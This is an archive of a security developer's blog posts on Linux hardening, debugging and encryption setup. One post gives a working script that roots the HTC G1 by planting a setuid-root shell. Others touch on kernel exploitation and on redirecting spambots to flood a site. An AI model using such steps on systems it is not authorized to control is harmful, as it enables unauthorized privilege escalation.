codeblog code is freedom — patching my itch

November 18, 2008

md5 lookups for 4 chars and common words

Filed under: Blogging,Debian,Security,Ubuntu,Web — kees @ 8:19 pm

Here’s a fun link. This site appears to have seeded their md5 hash list with all lower case character strings of 4 characters or fewer and many english words (probably from some large dictionaries), and they seem to be adding more as they go. This makes me want to put up an interface to the 7 character alpha-numeric-plus-many-special-chars rainbow table I’ve got. But searching the 500G table for a single hash takes… a while. I’d need to batch it up. Go-go-gadget web 2.0!

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 9, 2008

“rooting” the HTC G1 Android

Filed under: Blogging,Debian,Embedded,Security,Ubuntu,Vulnerabilities — kees @ 10:27 am

People noticed that running telnetd seemed to run as root. Later it was discovered that everything you typed was being run by the root user also. So, that ends the first mystery: when you typed “telnetd” both the Terminal user and root ran it. It would fail (without error messages) for the Terminal user, and run successfully for the root user. So now, the question is, what the f is a root shell doing mirroring user input?!

So, there is a much easier way to get root that doesn’t require network connectivity. While the /sdcard mount point is nosuid,noexec, it’ll still run scripts if you explicitly direct them to run. It seems that the weird background root shell doesn’t understand the alt-keys, so it can only run stuff that can be typed without using alt, shift, etc. So, put the following in /sdcard/pwn:

mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
cd /system/bin
cat sh > sh.root
chmod 4755 sh.root
mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system

You can either do this by dropping the file in place over USB mass storage, or you can type it via the Terminal using “cat“. (Rebooting here might help get the root shell in a sane state.) Finally, just navigate there without slashes and run the script:

$ cd sdcard
$ sh pwn

You’ll see lots of errors (but these are only from the Terminal user). The script is, however, run by the root shell too. You can verify the results:

$ ls -l /system/bin/sh*
-rwxr-xr-x root          shell     86936 2008-09-13 00:13 sh
-rwsr-xr-x root          root      86936 2008-11-09 10:12 sh.root

Next up: cross-compiling a little helper to elevate to real UID 0, and require a password to keep malware from looking for setuid shells.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 3, 2008

days since last incident…

Filed under: Blogging,Debian,Networking,Security,Ubuntu,Ubuntu-Server — kees @ 11:15 am

If I made one of those work-site signs that tracked “Days since last incident”, and made one for “Days since last in-the-wild remote-root worm” for Windows and Linux, what would they each say? 0 and 7304 respectively?

Update: while the post was tongue-in-cheek (everyone suffers when any large subset of computers is being attacked), I should lower the Linux days count to 2783 (for L10n on March 23, 2001, which is slightly newer than Ramen on January 17, 2001). Thanks for everyone’s comments. :)

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 21, 2008

Feisty Finale

Filed under: Blogging,Security,Ubuntu,Ubuntu-Server — kees @ 3:59 pm

Feisty is now officially at end-of-life.

Looking back through my build logs, I can see that my desktop spent 34 hours, 44 minutes, and 46 seconds building 255 security updates. (And 25 hours, 40 minutes, 13 seconds doing 249 builds during the Feisty devel window.) As before, these times obviously don’t include patch hunting/development, failed builds, testing, stuff done on my laptop or the porting machines, etc.

As a correction to the Edgy EOL post, my desktop actually spent 50:59:40 doing 322 security builds and 04:14:23 doing 84 devel builds.

Current standings:

dapper: 49:42:36
gutsy: 43:14:36
hardy: 166:11:15
intrepid: 70:24:52

As mentioned, these numbers are mixed devel/security times.

Thank you Feisty! You were much more stable than Edgy, even if we didn’t see eye-to-eye about wifi connectivity.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 4, 2008

all PIE distro

Filed under: Blogging,Security,Ubuntu,Ubuntu-Server — kees @ 2:00 pm

Major props to NCommander for taking on the painful experiment of getting the entire Ubuntu Intrepid archive rebuilt with PIE on amd64. After getting all the other hardening defaults enabled for Intrepid, PIE is the last on the original list for enabling “by default”. Due to the overhead of PIE on i386, it’s really only an option on architectures with lots of general registers.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

August 20, 2008

Ubuntu security repository structure

Filed under: Blogging,Security,Ubuntu,Ubuntu-Server — kees @ 12:04 pm

Miguel Ruiz asked about Ubuntu security repositories. Here’s how things are done:

The “” archive contains explicitly only the “$RELEASE-security” pockets. It is included in all Ubuntu sources.list files so that the package manager knows what the most recent security release of a package will be.

The central “” server (and all the Ubuntu mirrors) also contain the “$RELEASE-security” pockets, in addition to the rest of the archive (and will continue to have all pockets — which answers the core of Miguel’s question). While mirrors are not required to mirror the -security pocket, it certainly helps with the load on the primary Ubuntu archive servers.

The “” entry is last in sources.list, giving the option of pulling an updated package from an earlier mentioned mirror (resulting in a faster download for the user, and less bandwidth used by the central Ubuntu archive servers). In the case that the mirror is behind, the package is available directly from “”. In this way, mirrors cannot (accidentally or intentionally) “go rogue” — the latest security updates are always visible on the security archive server.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

April 25, 2008

Farwell Edgy

Filed under: Blogging,Security,Ubuntu — kees @ 6:39 pm

Edgy is now officially at end-of-life.

Looking back through my build logs, I can see that my desktop spent 55 hours, 14 minutes, and 3 seconds on 406 builds related to edgy-security updates I was involved in publishing. These times obviously don’t include patch hunting/development, failed builds, testing, stuff done on my laptop or the porting machines, etc. Comparing to my prior post on this topic, here are the standings for other releases:

dapper: 44:48:24
feisty: 58:49:04
gutsy: 37:06:08
hardy: 86:25:58

Hmm… I think my hardy numbers include devel builds times… I’ll have to sort that out. :)

Thank you Edgy! I will remember you for your wonderful default -fstack-protector.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

March 16, 2008

SELinux in Hardy

Filed under: Security,Ubuntu — kees @ 1:32 pm

Hardy has seen a major overhaul in the SELinux department. Prior to the Hardy UDS, the folks at Tresys had contacted me, asking “why doesn’t SELinux work with Ubuntu?” and I basically said, “because no one has given it any attention, yet — feel free to help out.” And so they did! :)

As a result, if AppArmor isn’t the MAC system you want, you can now install a functional SELinux system on Ubuntu with just a simple “sudo apt-get install selinux”.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

March 5, 2008

swapping encryption, hurting your head

Filed under: Security,Ubuntu — kees @ 11:18 am

Last week Soren helped me move my manually cryptsetup’d swap partition into the initramfs logic so that I could hibernate. Bottom line was:

  1. Create /etc/initramfs-tools/conf.d/cryptroot for your partition, based on the logic and defaults in /usr/share/initramfs-tools/scripts/local-top/cryptroot.
  2. Convert the existing encrypted swap to the new configuration.
  3. Update initrd, reboot, enjoy.

Assuming your swap partition (in encrypted form) is stored at /dev/laptopvg/swaprawlv, and you want your accessible swap partition as /dev/mapper/swap, here are the above steps in detail:

Doing step 1 is simple, we’re assuming the defaults from the cryptroot script above:

    echo source=/dev/laptopvg/swaprawlv target=swap > /etc/initramfs-tools/conf.d/cryptroot

Step 2 hurt my head. Make sure you’ve unmounted your swap before attempting this, or you can destroy the partition contents. The parameters come from the cryptroot script again:

    swapoff /dev/mapper/swap
    vol_id /dev/mapper/swap
    cryptsetup -c aes-cbc-essiv:sha256 -h sha256 -s 256 create swap2 /dev/laptopvg/swaprawlv
    dd if=/dev/mapper/swap of=/dev/mapper/swap2 bs=4k
    cryptsetup remove swap
    vol_id /dev/mapper/swap2

Step 3 is simple again:

    update-initramfs -u
    shutdown -r now


© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

February 20, 2008

OSS Security – OSU CS419 2008

Filed under: Security,Ubuntu — kees @ 5:36 pm

Today I gave my presentation on Open Source Security to the Open Source class at Oregon State University. Along with the presentation is a collection of examples of bad (and good) programs ranging from XSS, CSRF, temp races, system() and SSL misuse, stack and heap memory corruption, format strings, and all sorts of other things I could think of. I gave this presentation in 2007 and was again honored to be asked back in 2008. I think more schools need to be teaching dedicated Open Source classes, and I’m pleased to help out. I’m hoping people will take away a few good ideas that will contribute to them producing safe code.

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 15, 2008

full ASLR in Hardy

Filed under: Security,Ubuntu — kees @ 11:07 am

Thanks to all the people that worked on it from the coding, breaking, testing, and refactoring, Hardy is now sporting the last piece of full Address Space Layout Randomization support. ASLR has been mostly unchanged since Dapper, when the first bits of ASLR went in: stack and mmap (library) randomization. Those changes made simple stack overflow, heap overflow, and return-into-libc attacks much less trivial. Now in Hardy, with the VDSO and brk (text) randomization, things are even more difficult for attackers to exploit.

For binaries that have been compiled with -pie (Position Independent Executable), the kernel is finally able to take advantage of it. As an example, openssh is already using this compile option, and the results are easy to see. Here are the processes from two SSH connections:

$ pstree -lp | grep sshd
        |            +-sshd(9181)---sshd(9185)---bash(9186)

If we examine the memory layout of both sshd processes (9136 and 9181), we can see no user-space memory locations are shared:

$ sudo cat /proc/9136/maps
7ff69df86000-7ff69e0c6000 rw-s 00000000 00:09 34320                      /dev/zero (deleted)
7ff69e0c6000-7ff69e0c9000 r-xp 00000000 fe:15 480495                     /lib/security/
7ff6a1fc8000-7ff6a1fd0000 rw-p 7ff6a1fc8000 00:00 0 
7ff6a1ff7000-7ff6a1ffa000 rw-p 7ff6a1ff7000 00:00 0 
7ff6a1ffa000-7ff6a1ffc000 rw-p 0001d000 fe:15 1040531                    /lib/
7ff6a1ffc000-7ff6a205b000 r-xp 00000000 fe:15 98598                      /usr/sbin/sshd
7ff6a225a000-7ff6a225d000 rw-p 0005e000 fe:15 98598                      /usr/sbin/sshd
7ff6a225d000-7ff6a2289000 rw-p 7ff6a225d000 00:00 0                      [heap]
7fffaa045000-7fffaa05a000 rw-p 7ffffffea000 00:00 0                      [stack]
7fffaa1fe000-7fffaa200000 r-xp 7fffaa1fe000 00:00 0                      [vdso]
$ sudo cat /proc/9181/maps
7f05a07b8000-7f05a08f8000 rw-s 00000000 00:09 35989                      /dev/zero (deleted)
7f05a08f8000-7f05a08fb000 r-xp 00000000 fe:15 480495                     /lib/security/
7f05a47fa000-7f05a4802000 rw-p 7f05a47fa000 00:00 0 
7f05a4829000-7f05a482c000 rw-p 7f05a4829000 00:00 0 
7f05a482c000-7f05a482e000 rw-p 0001d000 fe:15 1040531                    /lib/
7f05a482e000-7f05a488d000 r-xp 00000000 fe:15 98598                      /usr/sbin/sshd
7f05a4a8c000-7f05a4a8f000 rw-p 0005e000 fe:15 98598                      /usr/sbin/sshd
7f05a4a8f000-7f05a4abb000 rw-p 7f05a4a8f000 00:00 0                      [heap]
7fffac877000-7fffac88c000 rw-p 7ffffffea000 00:00 0                      [stack]
7fffac9fe000-7fffaca00000 r-xp 7fffac9fe000 00:00 0                      [vdso]

The larger the memory space, the more effective ASLR is, so 64bit is the way to go. And, as always, using 64bit kernels automatically gives you the NX bit protections too. Running a 64bit Hardy system is going to rock. :)

© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

December 21, 2007

best universal remote evar

Filed under: Blogging,Security,Ubuntu — kees @ 6:16 pm

As a quick break from software, I spent a little time this evening soldering together my TV-B-Gone Kit. It was way fun to break out all my microelectronics gear. Gave me an excuse to clean up my desk. This thing is the silliest tool ever: it’s programmed with a mess of TV remote codes — but only those to turn off TVs. So, just point at a TV near you, hit the button, and it’ll almost certainly turn off.

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 24, 2007

0x41 0x41 0x41 0x41

Filed under: Security,Ubuntu,Vulnerabilities — kees @ 8:34 pm

When trying to find buffer overflows, it is common practice to try and fill memory with lots of “A” characters. I first saw this when learning basic stack smashing techniques from Smashing the Stack for Fun and Profit, and have long wondered who did it first. Ever since, I’ve always used long strings of “A”s too (sometimes “B”s), and only recently started using better things like Metasploit’s pattern generator and offset reporter.

I’m fairly used to seeing things like this from my gdb sessions:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

It means I’ve managed to gain control of the instruction pointer, and I’m now to the stage of needing to locate and deliver a shellcode.

Over the weekend I had the pleasure of causing my kernel to do something similar, via an unprivileged userspace process, using the vulnerability discovered by Wojciech Purczynski:

[119647.578349] general protection fault: 0000 [3] SMP
[119647.578357] CPU 0

[119647.578759] Code: Bad RIP value.
[119647.578774] RIP [<4141414141414141>]

I hadn’t had an opportunity to play with kernel shellcode before, so I ended up learning a lot from Brad Spengler. Before the day was up, I was left staring at a root shell.

This was a nasty bug. Luckily, it’s “only” a local exploit, and only for x86_64 kernels. But that’s still a very large number of installations. Please make sure your x86_64 machines are patched against CVE-2007-4573 (for Ubuntu, this is USN-518-1).

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

September 15, 2007

catching stack overflows in gdb as they happen

Filed under: Reverse Engineering,Security,Ubuntu — kees @ 8:57 pm

Recently I was trying to help debug a stack overflow crash in wpa_supplicant. The trouble with a stack crash is that you end up without a useful call history since the stack is left partially wrecked. The compiler code for detecting stack overflows (SSP), sets up a canary value between the local variables of the function and the stack frame. When the function exits, it tests this canary value and aborts if it doesn’t match what it is expecting. So, logically, to catch the stack overflow, gdb needs to be set up in a way to watch the canary location too. Since the canary is only valid while in the function, gdb must be set up to have a memory watch only when the function is called.

Here is the function preamble:

0x08081940 <wpa_driver_wext_get_scan_results+0>:        push   %ebp
0x08081941 <wpa_driver_wext_get_scan_results+1>:        mov    %esp,%ebp
0x08081943 <wpa_driver_wext_get_scan_results+3>:        push   %edi
0x08081944 <wpa_driver_wext_get_scan_results+4>:        push   %esi
0x08081945 <wpa_driver_wext_get_scan_results+5>:        push   %ebx

Save registers, prepare %ebp.

0x08081946 <wpa_driver_wext_get_scan_results+6>:        mov    $0x1000,%ebx
0x08081951 <wpa_driver_wext_get_scan_results+17>:       mov    0x8(%ebp),%eax
0x08081954 <wpa_driver_wext_get_scan_results+20>:       mov    0xc(%ebp),%edx
0x08081957 <wpa_driver_wext_get_scan_results+23>:       lea    0xffffffb0(%ebp),%esi

Make room for local variables, copy some function arguments and local variables into registers.

0x0808195a <wpa_driver_wext_get_scan_results+26>:       mov    %gs:0x14,%ecx
0x08081961 <wpa_driver_wext_get_scan_results+33>:       mov    %ecx,0xffffffec(%ebp)
0x08081964 <wpa_driver_wext_get_scan_results+36>:       xor    %ecx,%ecx

Here’s the stack canary getting set, and the register cleared. It’s saved at %ebp minus 0x14 (0xffffffec signed is -0x14):

(gdb) printf "0x%x\n", 0-0xffffffec

Now for the function play-out:

0x08081a37 <wpa_driver_wext_get_scan_results+247>:      mov    0xffffffec(%ebp),%edx
0x08081a3a <wpa_driver_wext_get_scan_results+250>:      xor    %gs:0x14,%edx
0x08081a41 <wpa_driver_wext_get_scan_results+257>:      jne    0x8081eae <wpa_driver_wext_get_scan_results+1390>

There is the canary check.

0x08081a47 <wpa_driver_wext_get_scan_results+263>:      add    $0xec,%esp
0x08081a4d <wpa_driver_wext_get_scan_results+269>:      pop    %ebx
0x08081a4e <wpa_driver_wext_get_scan_results+270>:      pop    %esi
0x08081a4f <wpa_driver_wext_get_scan_results+271>:      pop    %edi
0x08081a50 <wpa_driver_wext_get_scan_results+272>:      pop    %ebp
0x08081a51 <wpa_driver_wext_get_scan_results+273>:      ret    
0x08081eae <wpa_driver_wext_get_scan_results+1390>:     call   0x804bdc8 <__stack_chk_fail@plt>

Release local stack, pop saved registers and return. Nearer the end is the call to __stack_chk_fail when the canary doesn’t match.

So, to watch the canary, we need to set up a memory watch after it as been set, and tear it down before we leave the function. Respectively, we can use addresses 0x08081964 and 0x08081a3a (in bold above):

(gdb) br *0x08081964
Breakpoint 1 at 0x8081964
(gdb) br *0x08081a3a
Breakpoint 2 at 0x8081a3a

At the first breakpoint, we set a memory watch using a gdb-local variable, based on %ebp (we can’t use %ebp directly since it will change in lower function calls):

(gdb) commands 1
Type commands for when breakpoint 1 is hit, one per line.
End with a line saying just "end".
>set variable $cow = (unsigned long*)($ebp - 0x14)
>watch *$cow

Since I couldn’t find an easy way to track the memory watch number that was created during the first breakpoint, I just built a gdb counter, and deleted the memory watch when leaving, since I could predict gdb’s numbering (first watch will be “3”, following our breakpoints 1 and 2):

(gdb) set variable $count = 3
(gdb) commands 2
Type commands for when breakpoint 2 is hit, one per line.
End with a line saying just "end".
>delete $count
>set variable $count = $count + 1

Now we can run, and wait for the canary to get overwritten:

(gdb) cont
Hardware watchpoint 3: *$cow
Hardware watchpoint 4: *$cow
Hardware watchpoint 12: *$cow
Hardware watchpoint 13: *$cow
Hardware watchpoint 13: *$cow

Old value = 4278845440
New value = 4278845546
0x0804eae6 in ?? ()

We see the canary value is 0xFF0A0000 getting it’s little-endian first byte overwritten to FF0A006A. We catch it before it has wrecked the stack, and we can see very clearly where we are:

(gdb) bt
#0  hexstr2bin (hex=0x080a239d "6151663870517a74", buf=0x080a2395 "aQf8pQzt00000000j", len=8)
    at ../src/utils/common.c:88
#1  0x08082297 in wpa_driver_wext_get_scan_results (priv=0xb7dd816c, 
    results=0x080a239d, max_size=0x79)
    at ../src/drivers/driver_wext.c:1383
(gdb) x/1i $eip      
0x804eae6 <hexstr2bin +54>:      addl   $0x1,0xfffffff0(%ebp)

On a closer look at the source, we realize wext_get_scan_custom got inlined into the function (it was static and only called from one place, so the compiler optimized it). Further tracking in the source shows that the “16” value passed in should actually be “8” (the limit of the destination, not the source, buffer size).

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

August 7, 2007

flag captured again

Filed under: Reverse Engineering,Security — kees @ 4:22 pm

I thought last year was going to be a fluke. Somehow we managed to do it again. Team 1@stPlace won DefCon Capture the Flag for a second year in a row. If my sources are correct, this is the first repeat CTF winner at DefCon since the Ghetto Hackers. I’m honored to be on such a very talented team. I’ve only just recently recovered from getting almost no sleep for 3 days. :)

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

April 13, 2007

Farewell Breezy

Filed under: Blogging,Security,Ubuntu — kees @ 6:46 pm

Breezy is now officially at end-of-life.

Looking back through my build logs, I can see that my desktop spent 18 hours, 49 minutes, and 4 seconds on 108 builds related to the roughly 64 breezy-security updates I was involved in publishing. So far, Dapper is at 132 builds totaling 19:59:40, and Edgy is at 142 builds totaling 23:32:28. These times obviously don’t include patch hunting/development, failed builds, testing, stuff done on my laptop or the PPC machine, etc. Even if it’s a bit incomplete, I think it’s fun to be able to point to some hard numbers about CPU time spent on Breezy updates. :)

Thank you Breezy! You have housed my MythTV installation very nicely, but now it’s time for some long over-due upgrades…

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

April 2, 2007

AppArmor now in Feisty

Filed under: Security,Ubuntu — kees @ 11:03 am

With the help of Magnus Runesson, Jesse Michael, Martin Pitt, and many others, I’ve got AppArmor packaged and uploaded into Feisty universe. Prior to this, admins interested in a Mandatory Access Control system in Ubuntu only had SELinux available; now we have more of a choice. For anyone wanting to try out AppArmor, you will need to compile the modules, and install the base packages:

sudo apt-get install apparmor-modules-source dpatch
sudo m-a -v -t prepare
sudo m-a -v -t build apparmor-modules
sudo m-a -v -t install apparmor-modules
sudo apt-get install apparmor apparmor-utils apparmor-profiles libterm-readline-gnu-perl

With the default profiles, you can see one quick example of a confined process. Try doing this:

ping localhost >/dev/null &
sudo ps aZ | grep ping

In the first column, you should see what profile is being used to confine the process:

/bin/ping 14351 pts/14 S 0:00 ping localhost
unconstrained 15381 pts/14 S+ 0:00 grep ping

The list of active profiles can be seen as root in /sys/kernel/security/apparmor/profiles, which are loaded from /etc/apparmor.d/.

To confine a process, use aa-autodep and aa-logprof. For example, I wanted to confine my PDF document browser to only use /tmp (since I tend to only use it when browsing PDFs online):

  • First, I create an empty profile in “complain” mode: sudo aa-autodep evince
  • Next, I run evince like I normally would, including as many actions as I can think of (printing, preferences, help, etc). Watching the output of dmesg you can follow the trail of all the actions evince is taking. When I’m finished, I quit evince.
  • Next, I run aa-logprof, which runs through all the kernel audit output and offers suggestions on what to allow from evince. Where appropriate, I select “abstrations” for things like Gnome, DNS, fonts, tmp dir usage, etc. When a whole directory tree should be allowed, I double-glob the path (/usr/share/evince/**). Once all the items from the log have been processed, the profile is saved.
  • Finally, I enable the profile with aa-enforce evince. Any disallowed actions will show up in the kernel logs.

Check out the resulting profile for evince.

Now if I end up reading a malicious PDF that takes advantage of some currently-unknown vulnerability in evince, it will be confined to the above AppArmor profile, unable to exec new processes, and only able to write to the Gnome preferences for evince. (It’s also unable to read files out of /home, so that the above profile may be way too strict for common usage. And to even get caught by AppArmor, the imaginary exploit would have to avoid the randomized stack, randomized heap, stack protector, and, since I’m running 64bit, the NX processor bit.)

Be aware, this is still a new bit of packaging for Ubuntu, so you may run into sneaky gotchas. If that happens, please open a bug.

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 23, 2007

CVE links via Greasemonkey

Filed under: Blogging,Security,Ubuntu,Web — kees @ 10:00 pm

I spend a good bit of time reading CVEs but their entries are plain text, without links associated with their various recorded URLs. I’m annoyed at having to select/paste to load a URL, so I had to go code a work-around. :)

Since MozDev‘s “linkify.user.js” was a bit heavy-handed, I wrote up a quick hack based on similar code to only look at’s LI tags: “cve-links.user.js“.

© 2007, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

December 7, 2006

paranoid browsing with squid

Filed under: Security,Ubuntu — kees @ 11:40 pm

As Carthik says, the SSH SOCKS option is a great way to quickly tunnel your web traffic. A word of caution for the deeply paranoid: all your DNS traffic is still in the clear. While the web traffic and URLs aren’t sniffable any more, curious people can still get a sense for what kinds of stuff you’re browsing, based on domain names. (And for the really really paranoid: if you’re on open wireless, your DNS lookups could get hijacked, causing you to browse to look-alike sites ready to phish your login credentials.)

Luckily, with SOCKS5 Firefox can control which side of the proxy handles DNS lookups. By default, it does the lookups locally resulting in the scenario above. To change this, set network.proxy.socks_remote_dns = true in about:config. This makes the SOCKS proxy more like a regular proxy, where DNS is handled by the remote end of the tunnel.

Update: Oops, as the title hints, I was going to talk about Squid. But then I didn’t. It’s pretty cool too. Carry on…

© 2006 – 2016, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

August 7, 2006

flag captured

Filed under: Reverse Engineering,Security — kees @ 11:19 pm

I can’t believe it. We won DefCon CTF. I have no idea what to say. It just all came together this year. Great team, great contest.

And to make it even sweeter, since CTF is a “Black Badge” contest, I never have to pay to get into DefCon again! Although, at this point, I might pay several years worth of admission in exchange for lots of time to sleep. :)

UPDATE: nice write-up at the U of Florida.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

July 29, 2006

encrypted network filesystems

Filed under: Networking,Security — kees @ 11:59 am

I run a machine in a colo across the country from me, and I wanted to have some backups closer to the machine. So I signed up for a NAS login with my provider. Since I didn’t want to leave all my files sitting on their disks in the clear, I built up an encrypted volume over the network. It’s not fast, but it works.

Here were the setup steps:

  1. mkdir -p /mnt/nas-raw /mnt/backups
  2. smbmount // /mnt/nas-raw -o username=myaccount,password=mypassword
  3. modprobe loop && sleep 2
  4. dd if=/dev/zero of=/mnt/nas-raw/volume bs=32k
  5. losetup /dev/loop0 /mnt/nas-raw/volume
  6. cryptsetup create crypt-backups /dev/loop0 –cipher=aes-cbc-essiv:sha256
  7. Type volume pass-phrase
  8. mkfs.ext3 /dev/mapper/crypt-backups
  9. mount /dev/mapper/crypt-backups /mnt/backups

To unmount it:

  1. umount /mnt/backups
  2. cryptsetup remove crypt-backups
  3. losetup -d /dev/loop0
  4. umount /mnt/nas-raw

And then to remount it later:

  1. smbmount // /mnt/nas-raw -o username=myaccount,password=mypassword
  2. modprobe loop && sleep 2
  3. losetup /dev/loop0 /mnt/nas-raw/volume
  4. cryptsetup create crypt-backups /dev/loop0 –cipher=aes-cbc–essiv:sha256
  5. Type volume pass-phrase
  6. mount /dev/mapper/crypt-backups /mnt/backups

By scripting the “remount” steps, I can actually echo the volume password into an ssh connection:

echo ‘my volume pass-phrase here’ | ~/bin/do-crypto-mount
ssh root@colo.machine.isp “/etc/dirvish/dirvish-cronjob && df -h /mnt/backups”

Very handy!

Update: I added the --cipher option to include the essiv type, which should be used.

© 2006 – 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

July 28, 2006

airodump channel hopping

Filed under: Networking,Security — kees @ 7:14 am

The “airodump” tool, part of the aircrack wireless analysis suite, is like “tcpdump”, except that it can perform channel hopping. Since channel hopping is a “lossy” way to do wireless sniffing (you’re only listening on each channel for a few hundred milliseconds before moving on to the next channel), it doesn’t make sense to listen to channels that you know will contain no traffic. However, there was no way to specify a range of channels. airodump would either listen on 1 channel or hop across all channels.

I wrote a patch to allow for a comma-separated list of channels to be specified. Now I can tell airodump to spend all of its hopping time on 6, 11, and 1, for example:

airodump ath0 /tmp/ath0-logs 6,11,1

UPDATE: Here’s a patch that does that same for aircrack-ng.

© 2006 – 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

May 24, 2006

easy wordpress anti-spam

Filed under: Blogging,Networking,Security — kees @ 11:06 pm

After getting about 40 moderation requests a day, I figured I should spend some time finding some anti-comment-spam plugins for WordPress. After digging around a while, I found one that doesn’t require JavaScript, doesn’t perform vision tests, but works just fine for the kind of comment-spam-bot that seemed to have taken a liking to my blog (even though no spam ever appeared in my comments ever…)

I found lr2Spam which has a great setup, but an incomplete final step. I merged it with ideas I saw in the RBL measures plugin, and got some good results. By replacing lr2Spam’s comment_post with pre_comment_content (see the WordPress Plugin API), I was able to redirect spammers away from from my site with PHP’s header("Location: [URL]") technique. (This is what I borrowed from the RBL plugin.) The patch is almost as big as lr2Spam itself (both are very small). Honestly, I’m surprised it works at all. Someone wrote a comment-spam bot that can’t correctly parse a totally valid HTML form, but does correctly handle a 302/Location redirect. Weird.

I thought briefly about redirecting all the spammers to[IP] but then realized their requests’ referer header would show my URL still. On further thought, I realized that comment-spam is very different from email spam because the bot has to implement a much larger set of protocol elements. Since they must respect the 302/Location redirect, someone who is getting hit really hard with comment spam could effectively DDoS somone’s link by redirecting to somewhere with big files. Say, for example, instead of using above, I used Every spam bot in their network would start a giant-ass download from after hitting my anti-spam system. Ewww.

Implemented early on May 20th, after 4 days, I’ve seen 250 comment spam attempts from 162 unique IP addresses (most in China — maybe they need to turn their firewall around). The volume of spam isn’t big when compared to my daily email spam statistics, but each one of those would have been an email in my inbox, asking for moderation. Interestingly, they all stopped on May 23rd. Maybe they got a clue.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

May 3, 2006

fun with OpenID

Filed under: Blogging,Security,Web — kees @ 6:04 pm

While I can’t log into NetFlix or Amazon with OpenID (or other federated login systems), I still wanted to try it out. The goal is to easily write comments on people’s blogs, edit Wiki pages, etc, all without having to keep logging in every time. So far, so good.

First step was to decide between running my own OpenID server or not. I went with “not”, since there really isn’t an installable OpenID server yet (there are only support libraries, it seems). Since I was given a permanent account with LiveJournal for some XSS testing I did for them, I figured I’d just use their stuff. I wanted to use “” as my login everywhere, so I just added two lines to my HTML source:

<link rel=”openid.server” href=”” />
<link rel=”openid.delegate” href=”” />

Poof. Done. I used Videntity to verify that it was all working. Nifty stuff.

My only complaint is that it’s not clear how to get an end-to-end secure login. I can log into LiveJournal securely, but the OpenID server they run doesn’t seem to operate over HTTPS. Future study is needed. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

April 13, 2006

Bruce Schneier on attack trends

Filed under: Blogging,Security — kees @ 9:20 pm

On Wednesday I attended Bruce Schneier‘s short talk about the trends of online attacks. I figure I need to take his talk with at least a small grain of salt. While he has a reputation to maintain, he also works for a security outsourcing company. That in mind, I still like reading his blog, and I enjoyed hearing him talk.

The main take-away from his talk was that attackers are more rarely “hobbyists”, and more commonly criminals. (i.e. there is profit motive rather than an interest in boasting rights.) In the same vein, worms are becoming more sophisticated, quieter, and increasingly effective, while losing their cleverness. (Criminals don’t care if their worm is lame, they don’t care if they ripped off someone else’s worm, they care that their worm is staying undiscovered and is making them money. As a result, whole families of slightly different worms are appearing.)

One thing he said, that I have a hard time believing, and if true is pretty scary, is that cyber-crime profits are now exceeding drug profits. I would love to understand what the sources for that statistic are. Beyond just phishing, beyond worms waiting for you to authenticate to banks before emptying your wallet, there is even small-scale Denial-of-Service extortion. Generally, it’s against places that are themselves on tenuous legal ground, like offshore gambling sites. “If you don’t pay us $X, we’ll DoS you again!” It’s protection money online. Wild.

The market for blackhat exploits is growing. This is reducing the time between vulnerability announcement and exploit usage. Unfortunately, in the Microsoft world, an opposite trend is happening: patch speed is slowing due to their needing to test more and more configurations, staying infinitely backward compatible. At least this has an upside that their patches are generally better and corporations are learning to trust auto-update systems. (And I think this kind of brain-share is actually good for all OS vendors.)

The commoditization (and therefore homogenizing) of hardware and software means that everyone runs the same stuff. Even the criminals. Before, generally only the various corporations had old AS/400 machines and no one really wrote attacks against them. Now stuff runs on PCs.

Overall, the attacks online are becoming increasingly more damaging financially (“criminals are good at what they do”). The volume of attacks come from the open Internet, but the more successful attacks come from inside a private network. More worms are simply waiting for opportunity instead of beating on a network.

